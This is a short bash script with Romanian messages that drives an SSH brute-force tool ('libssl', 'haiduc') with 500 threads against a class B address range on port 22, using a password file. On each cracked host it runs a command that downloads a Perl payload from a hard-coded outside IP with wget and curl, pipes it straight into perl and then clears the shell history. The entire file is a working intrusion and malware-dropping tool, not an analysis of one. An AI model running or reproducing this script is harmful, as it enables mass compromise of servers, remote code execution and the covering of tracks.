#!/bin/bash
### Set conexiuni tool ###
passfile=pass
threads=500
port=22
#
WHI='[1;37m'
BLK='[1;30m'
RED='[1;31m'
YEL='[1;33m'
BLU='[1;34m'
RES='[0m'

if [ $# != 1 ]; then
        echo "${WHI}   Folosim: $0 <b class>${RES}"
        exit;
fi
./libssl $threads -b $1 $passfile $port "cd /tmp;wget -O - /tmp http://128.199.221.217/sql22|perl;curl -s /tmp http://128.199.221.217/sql22|perl -s;history -c -n"
sleep 60
sleep 60
pkill haiduc
sleep 2
pkill haiduc
pkill haiduc
sleep 2
echo "${RED}[+]${BLK} Brutele TERMINAT.${RES}"
